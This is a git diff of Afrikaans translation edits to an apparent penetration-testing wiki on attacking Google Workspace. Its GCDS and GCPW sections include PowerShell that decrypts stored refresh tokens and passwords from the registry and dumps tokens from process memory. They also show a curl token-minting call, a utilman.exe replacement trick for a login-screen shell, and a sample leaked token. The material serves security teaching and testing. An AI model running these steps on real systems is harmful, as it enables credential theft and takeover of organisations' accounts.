#### Delegasie beperkings & beperkings
@@ -96,7 +96,7 @@ Gebruikers kan slegs toegang aan 'n ander gebruiker in dieselfde organisasie del
- 'n Enkele Gmail-rekening ondersteun tot 1,000 unieke gedelegeerdes. 'n Groep in Groepe tel as een gedelegeerde teen die limiet.
- Delegasie verhoog nie die limiete vir 'n Gmail-rekening nie. Gmail-rekeninge met gedelegeerde gebruikers het die standaard Gmail-rekening limiete en beleide. Vir besonderhede, besoek [Gmail limiete en beleide](https://support.google.com/a/topic/28609).
#### Stap 1: Skakel Gmail delegasie aan vir jou gebruikers
#### Stap 1: Skakel Gmail-delegasie aan vir jou gebruikers
**Voordat jy begin:** Om die instelling vir sekere gebruikers toe te pas, plaas hul rekeninge in 'n [organisatoriese eenheid](https://support.google.com/a/topic/1227584).
@@ -104,7 +104,7 @@ Gebruikers kan slegs toegang aan 'n ander gebruiker in dieselfde organisasie del
Teken in met 'n _administrateur rekening_, nie jou huidige rekening CarlosPolop@gmail.com nie.
2. In die Admin-konsol, gaan na Menu ![](https://storage.googleapis.com/support-kms-prod/JxKYG9DqcsormHflJJ8Z8bHuyVI5YheC0lAp)![en dan](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)![](https://storage.googleapis.com/support-kms-prod/ocGtUSENh4QebLpvZcmLcNRZyaTBcolMRSyl) **Apps**![en dan](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Google Workspace**![en dan](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Gmail**![en dan](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Gebruiker instellings**.
2. In die Admin-konsol, gaan na Menu ![](https://storage.googleapis.com/support-kms-prod/JxKYG9DqcsormHflJJ8Z8bHuyVI5YheC0lAp)![en dan](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)![](https://storage.googleapis.com/support-kms-prod/ocGtUSENh4QebLpvZcmLcNRZyaTBcolMRSyl) **Apps**![en dan](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Google Workspace**![en dan](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Gmail**![en dan](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Gebruikersinstellings**.
3. Om die instelling vir almal toe te pas, laat die boonste organisatoriese eenheid geselekteer. Andersins, kies 'n kind [organisatoriese eenheid](https://support.google.com/a/topic/1227584).
4. Klik op **Posdelegasie**.
5. Merk die **Laat gebruikers toe om toegang tot hul posbus aan ander gebruikers in die domein te verleen** blokkie.
@@ -113,14 +113,14 @@ Teken in met 'n _administrateur rekening_, nie jou huidige rekening CarlosPolop@
- **Wys die rekening eienaar en die gedelegeerde wat die e-pos gestuur het**—Boodskappe sluit die e-pos adresse van die Gmail rekening eienaar en die gedelegeerde in.
- **Wys slegs die rekening eienaar**—Boodskappe sluit slegs die e-pos adres van die Gmail rekening eienaar in. Die gedelegeerde e-pos adres is nie ingesluit nie.
8. (Opsioneel) Om gebruikers toe te laat om 'n groep in Groepe as 'n gedelegeerde toe te voeg, merk die **Laat gebruikers toe om toegang tot hul posbus aan 'n Google-groep te verleen** blokkie.
9. Klik op **Stoor**. As jy 'n kind organisatoriese eenheid geconfigureer het, kan jy dalk **Erf** of **Oorheers** 'n ouer organisatoriese eenheid se instellings.
10. (Opsioneel) Om Gmail delegasie vir ander organisatoriese eenhede aan te skakel, herhaal stappe 39.
9. Klik op **Stoor**. As jy 'n kind organisatoriese eenheid geconfigureer het, kan jy dalk **Erf** of **Oorskry** 'n ouer organisatoriese eenheid se instellings.
10. (Opsioneel) Om Gmail-delegasie vir ander organisatoriese eenhede aan te skakel, herhaal stappe 39.
Veranderings kan tot 24 uur neem, maar gebeur gewoonlik vinniger. [Leer meer](https://support.google.com/a/answer/7514107)
Veranderinge kan tot 24 uur neem, maar gebeur gewoonlik vinniger. [Leer meer](https://support.google.com/a/answer/7514107)
#### Stap 2: Laat gebruikers gedelegeerdes vir hul rekeninge opstel
Nadat jy delegasie aangeskakel het, gaan jou gebruikers na hul Gmail instellings om gedelegeerdes toe te ken. Gedelegeerdes kan dan boodskappe namens die gebruiker lees, stuur en ontvang.
Nadat jy delegasie aangeskakel het, gaan jou gebruikers na hul Gmail-instellings om gedelegeerdes toe te ken. Gedelegeerdes kan dan boodskappe namens die gebruiker lees, stuur en ontvang.
Vir besonderhede, verwys gebruikers na [Delegeer en werk saam aan e-pos](https://support.google.com/a/users/answer/138350).
@@ -140,8 +140,8 @@ As jy Gmail deur jou werk, skool of ander organisasie gebruik:
- Met tipiese gebruik kan 40 gedelegeerde gebruikers terselfdertyd toegang tot 'n Gmail-rekening verkry.
- As jy geoutomatiseerde prosesse gebruik, soos API's of blaaiers uitbreidings, kan 'n paar gedelegeerdes terselfdertyd toegang tot 'n Gmail-rekening verkry.
1. Op jou rekenaar, maak [Gmail](https://mail.google.com/) oop. Jy kan nie gedelegeerdes vanaf die Gmail-app byvoeg nie.
2. Klik regs bo op Instellings ![Instellings](https://lh3.googleusercontent.com/p3J-ZSPOLtuBBR_ofWTFDfdgAYQgi8mR5c76ie8XQ2wjegk7-yyU5zdRVHKybQgUlQ=w36-h36) ![en dan](https://lh3.googleusercontent.com/3_l97rr0GvhSP2XV5OoCkV2ZDTIisAOczrSdzNCBxhIKWrjXjHucxNwocghoUa39gw=w36-h36) **Sien alle instellings**.
1. Op jou rekenaar, maak [Gmail](https://mail.google.com/) oop. Jy kan nie gedelegeerdes vanuit die Gmail-app byvoeg nie.
2. Klik regs bo op Instellings ![Settings](https://lh3.googleusercontent.com/p3J-ZSPOLtuBBR_ofWTFDfdgAYQgi8mR5c76ie8XQ2wjegk7-yyU5zdRVHKybQgUlQ=w36-h36) ![en dan](https://lh3.googleusercontent.com/3_l97rr0GvhSP2XV5OoCkV2ZDTIisAOczrSdzNCBxhIKWrjXjHucxNwocghoUa39gw=w36-h36) **Sien alle instellings**.
3. Klik op die **Rekeninge en Invoer** of **Rekeninge** tab.
4. In die "Verleen toegang tot jou rekening" afdeling, klik op **Voeg 'n ander rekening by**. As jy Gmail deur jou werk of skool gebruik, mag jou organisasie e-posdelegasie beperk. As jy nie hierdie instelling sien nie, kontak jou admin.
- As jy nie "Verleen toegang tot jou rekening" sien nie, dan is dit beperk.

View File

@@ -4,14 +4,14 @@
## Google Groups Privesc
Standaard in Workspace kan 'n **groep** **vrylik toeganklik** wees vir enige lid van die organisasie.\
Standaard in workspace kan 'n **groep** **vrylik toeganklik** wees vir enige lid van die organisasie.\
Workspace laat ook toe om **toestemming aan groepe te gee** (selfs GCP-toestemmings), so as groepe bygevoeg kan word en hulle het ekstra toestemmings, kan 'n aanvaller daardie pad **misbruik om voorregte te verhoog**.
Jy het moontlik toegang tot die konsole nodig om groepe te sluit wat deur enigeen in die org bygevoeg kan word. Kontroleer groepe-inligting in [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups).
### Toegang tot Groep E-pos inligting
As jy daarin geslaag het om 'n **google gebruikersessie te kompromitteer**, kan jy vanaf [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups) die geskiedenis van e-posse wat na die e-posgroepe gestuur is waarvan die gebruiker 'n lid is, sien, en jy mag **bewyse** of ander **sensitiewe data** vind.
As jy daarin geslaag het om 'n **google gebruiker sessie te kompromitteer**, kan jy vanaf [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups) die geskiedenis van e-posse wat na die e-posgroepe gestuur is waarvan die gebruiker 'n lid is, sien, en jy mag **bewyse** of ander **sensitiewe data** vind.
## GCP <--> GWS Pivoting
@@ -19,13 +19,13 @@ As jy daarin geslaag het om 'n **google gebruikersessie te kompromitteer**, kan
../gcp-security/gcp-to-workspace-pivoting/
{{#endref}}
## Takeout - Laai Alles Af wat Google oor 'n rekening Weet
## Takeout - Laai Alles Af wat Google oor 'n rekening weet
As jy 'n **sessie binne die slagoffer se google rekening** het, kan jy alles aflaai wat Google oor daardie rekening stoor vanaf [**https://takeout.google.com**](https://takeout.google.com/u/1/?pageId=none)
## Vault - Laai al die Workspace data van gebruikers af
As 'n organisasie **Google Vault geaktiveer** het, mag jy in staat wees om toegang te verkry tot [**https://vault.google.com**](https://vault.google.com/u/1/) en **af te laai** al die **inligting**.
As 'n organisasie **Google Vault geaktiveer** het, mag jy toegang hê tot [**https://vault.google.com**](https://vault.google.com/u/1/) en **aflaai** al die **inligting**.
## Kontak aflaai
@@ -33,19 +33,19 @@ Vanaf [**https://contacts.google.com**](https://contacts.google.com/u/1/?hl=es&t
## Cloudsearch
In [**https://cloudsearch.google.com/**](https://cloudsearch.google.com) kan jy net **deur al die Workspace-inhoud** (e-pos, drive, webwerwe...) soek waartoe 'n gebruiker toegang het. Ideaal om **vinnige sensitiewe inligting te vind**.
In [**https://cloudsearch.google.com/**](https://cloudsearch.google.com) kan jy net **deur al die Workspace-inhoud** (e-pos, drive, sites...) soek waartoe 'n gebruiker toegang het. Ideaal om **vinnige sensitiewe inligting te vind**.
## Google Chat
In [**https://mail.google.com/chat**](https://mail.google.com/chat) kan jy toegang verkry tot 'n Google **Chat**, en jy mag sensitiewe inligting in die gesprekke vind (indien enige).
In [**https://mail.google.com/chat**](https://mail.google.com/chat) kan jy toegang kry tot 'n Google **Chat**, en jy mag sensitiewe inligting in die gesprekke vind (indien enige).
## Google Drive Mining
Wanneer jy 'n dokument **deel**, kan jy die **mense** wat toegang kan hê, een vir een **specifiseer**, of dit met jou **hele maatskappy** (**of** met 'n paar spesifieke **groepe**) **deel** deur 'n **skakel te genereer**.
Wanneer jy 'n dokument **deel**, kan jy die **mense** wat toegang kan hê een vir een **specifiseer**, dit **deel** met jou **hele maatskappy** (**of** met 'n paar spesifieke **groepe**) deur 'n **skakel te genereer**.
Wanneer jy 'n dokument deel, kan jy in die gevorderde instellings ook **toelaat dat mense soek** na hierdie lêer (per **default** is dit **deaktiveer**). Dit is egter belangrik om te noem dat sodra gebruikers 'n dokument sien, dit deur hulle soekbaar is.
Vir eenvoudigheid sal die meeste mense 'n skakel genereer en deel eerder as om die mense wat toegang tot die dokument kan hê, een vir een by te voeg.
Vir eenvoudigheid sal die meeste mense 'n skakel genereer en deel eerder as om die mense wat toegang tot die dokument kan hê een vir een by te voeg.
Sommige voorgestelde maniere om al die dokumente te vind:
@@ -54,7 +54,7 @@ Sommige voorgestelde maniere om al die dokumente te vind:
## **Hou Aantekeninge**
In [**https://keep.google.com/**](https://keep.google.com) kan jy toegang verkry tot die aantekeninge van die gebruiker, **sensitiewe** **inligting** mag hier gestoor wees.
In [**https://keep.google.com/**](https://keep.google.com) kan jy toegang kry tot die aantekeninge van die gebruiker, **sensitiewe** **inligting** mag hier gestoor wees.
### Wysig App Scripts
@@ -62,7 +62,7 @@ In [**https://script.google.com/**](https://script.google.com/) kan jy die APP S
## **Administreer Workspace**
In [**https://admin.google.com**/](https://admin.google.com) mag jy in staat wees om die Workspace-instellings van die hele organisasie te wysig as jy genoeg toestemmings het.
In [**https://admin.google.com**/](https://admin.google.com), mag jy in staat wees om die Workspace-instellings van die hele organisasie te wysig as jy genoeg toestemmings het.
Jy kan ook e-posse vind deur deur al die gebruiker se fakture te soek in [**https://admin.google.com/ac/emaillogsearch**](https://admin.google.com/ac/emaillogsearch)

View File

@@ -2,14 +2,14 @@
{{#include ../../../banners/hacktricks-training.md}}
## GCPW - Google Credential Provider for Windows
## GCPW - Google Credential Provider vir Windows
Dit is die enkele aanmeldingsoplossing wat Google Workspaces bied sodat gebruikers in hul Windows PC's kan aanmeld met **hul Workspace akrediteer**. Boonop sal dit **tokens** stoor om toegang tot Google Workspace in sommige plekke in die PC te verkry: Skyf, geheue & die register... dit is selfs moontlik om die **duidelike teks wagwoord** te verkry.
Dit is die enkele aanmeldstelsel wat Google Workspaces bied sodat gebruikers op hul Windows-rekenaars kan aanmeld met **hulle Workspace akrediteerings**. Boonop sal dit **tokens** stoor om toegang tot Google Workspace in sommige plekke op die rekenaar te verkry: Skyf, geheue & die register... dit is selfs moontlik om die **duidelike teks wagwoord** te verkry.
> [!TIP]
> Let daarop dat [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) in staat is om **GCPW** te detecteer, inligting oor die konfigurasie te verkry en **selfs tokens**.
Vind meer inligting oor hierdie in:
Vind meer inligting hieroor in:
{{#ref}}
gcpw-google-credential-provider-for-windows.md
@@ -19,12 +19,12 @@ gcpw-google-credential-provider-for-windows.md
Dit is 'n hulpmiddel wat gebruik kan word om **jou aktiewe gids gebruikers en groepe na jou Workspace te sinkroniseer** (en nie andersom nie ten tyde van hierdie skrywe).
Dit is interessant omdat dit 'n hulpmiddel is wat die **akrediteer van 'n Workspace supergebruiker en bevoorregte AD gebruiker** benodig. Dit mag dus moontlik wees om dit binne 'n domeinbediener te vind wat gebruikers van tyd tot tyd sal sinkroniseer.
Dit is interessant omdat dit 'n hulpmiddel is wat die **akrediteerings van 'n Workspace supergebruiker en bevoorregte AD gebruiker** vereis. Dit mag dus moontlik wees om dit binne 'n domeinbediener te vind wat gebruikers van tyd tot tyd sal sinkroniseer.
> [!TIP]
> Let daarop dat [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) in staat is om **GCDS** te detecteer, inligting oor die konfigurasie te verkry en **selfs die wagwoorde en versleutelde akrediteer**.
> Let daarop dat [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) in staat is om **GCDS** te detecteer, inligting oor die konfigurasie te verkry en **selfs die wagwoorde en versleutelde akrediteerings**.
Vind meer inligting oor hierdie in:
Vind meer inligting hieroor in:
{{#ref}}
gcds-google-cloud-directory-sync.md
@@ -34,12 +34,12 @@ gcds-google-cloud-directory-sync.md
Dit is die binêre en diens wat Google bied om **die wagwoorde van die gebruikers tussen die AD** en Workspace gesinkroniseer te hou. Elke keer as 'n gebruiker sy wagwoord in die AD verander, word dit na Google gestel.
Dit word geïnstalleer in `C:\Program Files\Google\Password Sync` waar jy die binêre `PasswordSync.exe` kan vind om dit te konfigureer en `password_sync_service.exe` (die diens wat sal voortgaan om te loop).
Dit word geïnstalleer in `C:\Program Files\Google\Password Sync` waar jy die binêre `PasswordSync.exe` kan vind om dit te konfigureer en `password_sync_service.exe` (die diens wat aanhou loop).
> [!TIP]
> Let daarop dat [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) in staat is om **GPS** te detecteer, inligting oor die konfigurasie te verkry en **selfs die wagwoorde en versleutelde akrediteer**.
> Let daarop dat [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) in staat is om **GPS** te detecteer, inligting oor die konfigurasie te verkry en **selfs die wagwoorde en versleutelde akrediteerings**.
Vind meer inligting oor hierdie in:
Vind meer inligting hieroor in:
{{#ref}}
gps-google-password-sync.md
@@ -47,9 +47,9 @@ gps-google-password-sync.md
## Admin Directory Sync
Die hoofverskil tussen hierdie manier om gebruikers met GCDS te sinkroniseer is dat GCDS handmatig gedoen word met 'n paar binêre wat jy moet aflaai en uitvoer terwyl **Admin Directory Sync sonder 'n bediener** deur Google bestuur word in [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
Die hoofverskil tussen hierdie manier om gebruikers met GCDS te sinkroniseer, is dat GCDS handmatig gedoen word met 'n paar binêre wat jy moet aflaai en uitvoer terwyl **Admin Directory Sync sonder 'n bediener** deur Google bestuur word in [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
Vind meer inligting oor hierdie in:
Vind meer inligting hieroor in:
{{#ref}}
gws-admin-directory-sync.md

View File

@@ -6,21 +6,21 @@
Dit is 'n hulpmiddel wat gebruik kan word om **jou aktiewe gidsgebruikers en groepe na jou Workspace te sinkroniseer** (en nie andersom nie ten tyde van hierdie skrywe).
Dit is interessant omdat dit 'n hulpmiddel is wat die **bewyse van 'n Workspace superuser en bevoorregte AD-gebruiker** sal vereis. Dit mag dus moontlik wees om dit binne 'n domeinbediener te vind wat gebruikers van tyd tot tyd sal sinkroniseer.
Dit is interessant omdat dit 'n hulpmiddel is wat die **bewyse van 'n Workspace-supergebruiker en bevoorregte AD-gebruiker** sal vereis. Dit mag dus moontlik wees om dit binne 'n domeinbediener te vind wat van tyd tot tyd gebruikers sal sinkroniseer.
> [!NOTE]
> Om 'n **MitM** op die **`config-manager.exe`** binêre uit te voer, voeg net die volgende lyn in die `config.manager.vmoptions`-lêer by: **`-Dcom.sun.net.ssl.checkRevocation=false`**
> [!TIP]
> Let daarop dat [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) in staat is om **GCDS** te detecteer, inligting oor die konfigurasie te verkry en **selfs die wagwoorde en versleutelde bewysstukke**.
> Let daarop dat [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) in staat is om **GCDS** te detecteer, inligting oor die konfigurasie te verkry en **selfs die wagwoorde en versleutelde bewese**.
Let ook daarop dat GCDS nie wagwoorde van AD na Workspace sal sinkroniseer nie. As iets, sal dit net ewekansige wagwoorde genereer vir nuut geskepte gebruikers in Workspace soos jy in die volgende beeld kan sien:
<figure><img src="../../../images/telegram-cloud-photo-size-4-5780773316536156543-x.jpg" alt="" width="515"><figcaption></figcaption></figure>
### GCDS - Skyf Tokens & AD Bewyse
### GCDS - Skyf Tokens & AD Bewese
Die binêre `config-manager.exe` (die hoof GCDS binêre met GUI) sal die geconfigureerde Aktiewe Gids bewysstukke, die verfrissingstoken en die toegang standaard in 'n **xml-lêer** in die gids **`C:\Program Files\Google Cloud Directory Sync`** in 'n lêer genaamd **`Untitled-1.xml`** stoor. Alhoewel dit ook in die `Documents` van die gebruiker of in **enige ander gids** gestoor kan word.
Die binêre `config-manager.exe` (die hoof GCDS binêre met GUI) sal die geconfigureerde Aktiewe Gidsbewese, die verfrissingstoken en die toegang standaard in 'n **xml-lêer** in die gids **`C:\Program Files\Google Cloud Directory Sync`** in 'n lêer genaamd **`Untitled-1.xml`** stoor. Alhoewel dit ook in die `Documents` van die gebruiker of in **enige ander gids** gestoor kan word.
Boonop bevat die register **`HKCU\SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\ui`** binne die sleutel **`open.recent`** die paaie na al die onlangs geopende konfigurasielêers (xmls). Dit is dus moontlik om **dit na te gaan om hulle te vind**.
@@ -49,11 +49,11 @@ Die mees interessante inligting binne die lêer sal wees:
<authCredentialsEncrypted>XMmsPMGxz7nkpChpC7h2ag==</authCredentialsEncrypted>
[...]
```
Let op hoe die **refresh** **token** en die **wagwoord** van die gebruiker **geënkripteer** is met **AES CBC** met 'n ewekansig gegenereerde sleutel en IV wat gestoor is in **`HKEY_CURRENT_USER\SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\util`** (waar die **`prefs`** Java-biblioteek die voorkeure stoor) in die string sleutels **`/Encryption/Policy/V2.iv`** en **`/Encryption/Policy/V2.key`** wat in base64 gestoor is.
Let op hoe die **refresh** **token** en die **password** van die gebruiker **geënkripteer** is met **AES CBC** met 'n ewekansig gegenereerde sleutel en IV wat gestoor is in **`HKEY_CURRENT_USER\SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\util`** (waar die **`prefs`** Java-biblioteek die voorkeure stoor) in die string sleutels **`/Encryption/Policy/V2.iv`** en **`/Encryption/Policy/V2.key`** wat in base64 gestoor is.
<details>
<summary>Powershell-skrip om die refresh token en die wagwoord te dekripteer</summary>
<summary>Powershell-skrip om die refresh token en die password te dekripteer</summary>
```powershell
# Paths and key names
$xmlConfigPath = "C:\Users\c\Documents\conf.xml"
@@ -150,13 +150,13 @@ Write-Host "Decrypted Password: $decryptedPassword"
</details>
> [!NOTE]
> Let daarop dat dit moontlik is om hierdie inligting te kontroleer deur die java kode van **`DirSync.jar`** in **`C:\Program Files\Google Cloud Directory Sync`** te soek na die string `exportkeys` (aangesien dit die cli param is wat die binêre `upgrade-config.exe` verwag om die sleutels te dump).
> Let daarop dat dit moontlik is om hierdie inligting te kontroleer deur die java kode van **`DirSync.jar`** in **`C:\Program Files\Google Cloud Directory Sync`** te soek na die string `exportkeys` (aangesien dit die cli param is wat die binaire `upgrade-config.exe` verwag om die sleutels te dump).
In plaas daarvan om die powershell skrip te gebruik, is dit ook moontlik om die binêre **`:\Program Files\Google Cloud Directory Sync\upgrade-config.exe`** met die param `-exportKeys` te gebruik en die **Key** en **IV** uit die registrasie in hex te kry en dan net 'n bietjie cyberchef met AES/CBC en daardie sleutel en IV te gebruik om die inligting te ontsleutel.
In plaas daarvan om die powershell skrip te gebruik, is dit ook moontlik om die binaire **`:\Program Files\Google Cloud Directory Sync\upgrade-config.exe`** met die param `-exportKeys` te gebruik en die **Key** en **IV** uit die registrasie in hex te kry en dan net 'n bietjie cyberchef met AES/CBC en daardie sleutel en IV te gebruik om die inligting te ontsleutel.
### GCDS - Dumping tokens from memory
Net soos met GCPW, is dit moontlik om die geheue van die proses van die `config-manager.exe` proses (dit is die naam van die GCDS hoof binêre met GUI) te dump en jy sal in staat wees om verfris- en toegangstokens te vind (as hulle reeds gegenereer is).\
Net soos met GCPW, is dit moontlik om die geheue van die proses van die `config-manager.exe` proses (dit is die naam van die GCDS hoof binaire met GUI) te dump en jy sal in staat wees om verfris- en toegangstokens te vind (as hulle reeds gegenereer is).\
Ek raai jy kan ook die AD geconfigureerde akrediteerings vind.
<details>
@@ -235,9 +235,9 @@ Remove-Item -Path $dumpFolder -Recurse -Force
```
</details>
### GCDS - Genereer toegangstokens vanaf verfrissingstokens
### GCDS - Genereer toegangstokens vanaf hernuwingstokens
Deur die verfrissingstoken te gebruik, is dit moontlik om toegangstokens te genereer met dit en die kliënt-ID en kliëntgeheim wat in die volgende opdrag gespesifiseer is:
Deur die hernuwingstoken te gebruik, is dit moontlik om toegangstokens te genereer met dit en die kliënt-ID en kliëntgeheim wat in die volgende opdrag gespesifiseer is:
```bash
curl -s --data "client_id=118556098869.apps.googleusercontent.com" \
--data "client_secret=Co-LoSjkPcQXD9EjJzWQcgpy" \
@@ -250,7 +250,7 @@ https://www.googleapis.com/oauth2/v4/token
> [!NOTE]
> Let daarop dat dit nie moontlik is om enige skop vir die toegangstoken aan te vra nie, selfs al het jy 'n verfrissings-token, aangesien jy slegs die **skoppe wat deur die toepassing ondersteun word waar jy die toegangstoken genereer** kan aan vra.
>
> Ook is die verfrissings-token nie geldig in elke toepassing nie.
> Ook, die verfrissings-token is nie geldig in elke toepassing nie.
Standaard sal GCSD nie toegang hê as die gebruiker tot elke moontlike OAuth-skop nie, so deur die volgende skrip te gebruik, kan ons die skoppe vind wat met die `refresh_token` gebruik kan word om 'n `access_token` te genereer:
@@ -280,7 +280,7 @@ rm /tmp/valid_scopes.txt
```
</details>
En dit is die uitvoer wat ek op die tyd van skryf gekry het:
En dit is die uitvoer wat ek op die tyd van die skryf gekry het:
```
https://www.googleapis.com/auth/admin.directory.group
https://www.googleapis.com/auth/admin.directory.orgunit
@@ -321,6 +321,6 @@ curl -X POST \
# You could also change the password of a user for example
```
> [!CAUTION]
> Dit is nie moontlik om die nuwe gebruiker die Super Amin rol te gee nie omdat die **herlaai token nie genoeg skope het** om die vereiste voorregte te gee nie.
> Dit is nie moontlik om die nuwe gebruiker die Super Amin rol te gee nie omdat die **herlaai token nie genoeg skope het nie** om die vereiste voorregte te gee.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -11,7 +11,7 @@ Dit is die enkele aanmeld wat Google Workspaces bied sodat gebruikers op hul Win
### GCPW - MitM
Wanneer 'n gebruiker toegang tot 'n Windows-rekenaar wat gesinkroniseer is met Google Workspace via GCPW, sal dit 'n algemene aanmeldvorm moet voltooi. Hierdie aanmeldvorm sal 'n OAuth-kode teruggee wat die rekenaar vir die verversingstoken in 'n versoek soos:
Wanneer 'n gebruiker toegang tot 'n Windows-rekenaar wat gesinkroniseer is met Google Workspace via GCPW, sal dit 'n algemene aanmeldvorm moet voltooi. Hierdie aanmeldvorm sal 'n OAuth-kode teruggee wat die rekenaar vir die verfrissingstoken in 'n versoek soos:
```http
POST /oauth2/v4/token HTTP/2
Host: www.googleapis.com
@@ -28,16 +28,16 @@ scope=https://www.google.com/accounts/OAuthLogin
&device_type=chrome
```
> [!NOTE]
> Dit was moontlik om 'n MitM uit te voer deur `Proxifier` op die rekenaar te installeer, die `utilman.exe` binêre met 'n `cmd.exe` te oorskryf en die **toeganklikheidskenmerke** op die Windows aanmeldbladsy uit te voer, wat 'n **CMD** sal uitvoer waaruit jy **Proxifier kan begin en konfigureer**.\
> Dit was moontlik om 'n MitM uit te voer deur `Proxifier` op die PC te installeer, die `utilman.exe` binêre met 'n `cmd.exe` te oorskryf en die **toeganklikheidskenmerke** op die Windows aanmeldbladsy uit te voer, wat 'n **CMD** sal uitvoer waaruit jy die **Proxifier** kan **begin en konfigureer**.\
> Moet nie vergeet om **QUICK UDP** verkeer in `Proxifier` te blokkeer sodat dit na TCP kommunikasie afgradeer nie en jy dit kan sien.
>
> Konfigureer ook in "Gediensde en ander gebruikers" albei opsies en installeer die Burp CA sertifikaat in Windows.
> Konfigureer ook in "Gediensde en ander gebruikers" albei opsies en installeer die Burp CA sertifikaat in die Windows.
Boonop, deur die sleutels `enable_verbose_logging = 1` en `log_file_path = C:\Public\gcpw.log` in **`HKLM:\SOFTWARE\Google\GCPW`** toe te voeg, is dit moontlik om dit te laat stoor van sommige logs.
### GCPW - Vingerafdruk
Dit is moontlik om te kontroleer of GCPW op 'n toestel geïnstalleer is deur te kyk of die volgende proses bestaan of of die volgende registriesleutels bestaan:
Dit is moontlik om te kyk of GCPW op 'n toestel geïnstalleer is deur te kyk of die volgende proses bestaan of of die volgende registriesleutels bestaan:
```powershell
# Check process gcpw_extension.exe
if (Get-Process -Name "gcpw_extension" -ErrorAction SilentlyContinue) {
@@ -62,7 +62,7 @@ Write-Output "Google Accounts are present: The key $gcpwHKCUPath exists."
Write-Output "No Google Accounts found: The key $gcpwHKCUPath does not exist."
}
```
In **`HKCU:\SOFTWARE\Google\Accounts`** is dit moontlik om toegang te verkry tot die e-pos van die gebruiker en die versleutelde **refresh token** as die gebruiker onlangs ingeteken het.
In **`HKCU:\SOFTWARE\Google\Accounts`** is dit moontlik om die e-pos van die gebruiker en die versleutelde **refresh token** te bekom as die gebruiker onlangs ingeteken het.
In **`HKLM:\SOFTWARE\Google\GCPW\Users`** is dit moontlik om die **domeine** te vind wat toegelaat word om in te teken in die sleutel `domains_allowed` en in subsleutels is dit moontlik om inligting oor die gebruiker te vind soos e-pos, prentjie, gebruikersnaam, token lewensduur, token handvatsel...
@@ -98,7 +98,7 @@ In **`HKLM:\SOFTWARE\Google\GCPW\Users`** is dit moontlik om die **domeine** te
>
> Afaik is dit nie moontlik om 'n refresh token of toegang token van die token handvatsel te verkry nie.
Boonop is die lêer **`C:\ProgramData\Google\Credential Provider\Policies\<sid>\PolicyFetchResponse`** 'n json wat die inligting van verskillende **instellings** bevat soos `enableDmEnrollment`, `enableGcpAutoUpdate`, `enableMultiUserLogin` (as verskeie gebruikers van Workspace op die rekenaar kan aanmeld) en `validityPeriodDays` (aantal dae wat 'n gebruiker nie weer met Google direk hoef te verifieer nie).
Boonop is die lêer **`C:\ProgramData\Google\Credential Provider\Policies\<sid>\PolicyFetchResponse`** 'n json wat die inligting van verskillende **instellings** bevat soos `enableDmEnrollment`, `enableGcpAutoUpdate`, `enableMultiUserLogin` (as verskeie gebruikers van Workspace op die rekenaar kan in teken) en `validityPeriodDays` (aantal dae wat 'n gebruiker nie weer met Google direk hoef te verifieer nie).
## GCPW - Kry Tokens
@@ -159,24 +159,11 @@ Get-RegistryKeysAndDecryptTokens -keyPath $_.PSPath
# Start the search from the base key
Get-RegistryKeysAndDecryptTokens -keyPath $baseKey
```
```markdown
<details>
<summary>Voorbeeld</summary>
Hier is 'n voorbeeld van hoe om die GCPW te konfigureer.
1. Laai die GCPW af van die Google-webwerf.
2. Installeer die GCPW op die Windows-masjien.
3. Volg die aanwysings om die GCPW te konfigureer met jou Google-rekening.
Dit sal jou toelaat om jou Google-rekening te gebruik om aan te meld op Windows.
</details>
```
```
Path: Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\SOFTWARE\Google\Accounts\100402336966965820570Decrypted refresh_token: 1//03gQU44mwVnU4CDHYE736TGMSNwF-L9IrTuikNFVZQ3sBxshrJaki7QvpHZQMeANHrF0eIPebz0dz0S987354AuSdX38LySlWflI
```
As verduidelik in [**hierdie video**](https://www.youtube.com/watch?v=FEQxHRRP_5I), as jy nie die token in die register vind nie, is dit moontlik om die waarde te verander (of te verwyder) van **`HKLM:\SOFTWARE\Google\GCPW\Users\<sid>\th`** en die volgende keer wanneer die gebruiker die rekenaar benader, sal hy weer moet aanmeld en die **token sal in die vorige register gestoor word**.
Soos verduidelik in [**hierdie video**](https://www.youtube.com/watch?v=FEQxHRRP_5I), as jy nie die token in die registrasie vind nie, is dit moontlik om die waarde te verander (of te verwyder) van **`HKLM:\SOFTWARE\Google\GCPW\Users\<sid>\th`** en die volgende keer wanneer die gebruiker die rekenaar benader, sal hy weer moet aanmeld en die **token sal in die vorige registrasie gestoor word**.
### GCPW - Skyf Vernuwings Tokens
